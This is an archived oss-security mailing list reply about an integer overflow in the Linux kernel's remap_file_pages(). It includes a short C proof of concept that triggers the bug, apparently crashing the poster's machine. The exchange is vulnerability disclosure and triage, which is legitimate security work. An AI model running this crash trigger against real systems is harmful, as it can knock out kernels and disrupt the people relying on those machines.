[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] kernel: avoid pgoff overflow in remap_file_pages
From: akiphie <akiphie () lavabit ! com>
Date: 2010-10-12 18:27:39
Message-ID: 20101012182739.3560D11B926 () karen ! lavabit ! com
[Download RAW message or body]
On Tuesday 12 October 2010 09:19:29 Eugene Teo wrote:
> Thomas Pollet reported an integer overflow issue in remap_file_pages().
> While we are able to reproduce the issue, we are unable to find a
> security impact. If your views differ, do let us know.
This made my computer very sad :(
#include <sys/mman.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/shm.h>
\
int main(int argc, char **argv) \
{ \
int x = shmget(IPC_PRIVATE, 1, IPC_CREAT | IPC_EXCL | 0600); \
void *mem = shmat(x, NULL, 0); \
mremap(mem, 0x1000, 0x1000, MREMAP_MAYMOVE | MREMAP_FIXED, 0x0); \
remap_file_pages((void *) 0xfff, ~0UL, 0, -(~0UL >> 12), 0); \
return 0; \
} \
--
cnu
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic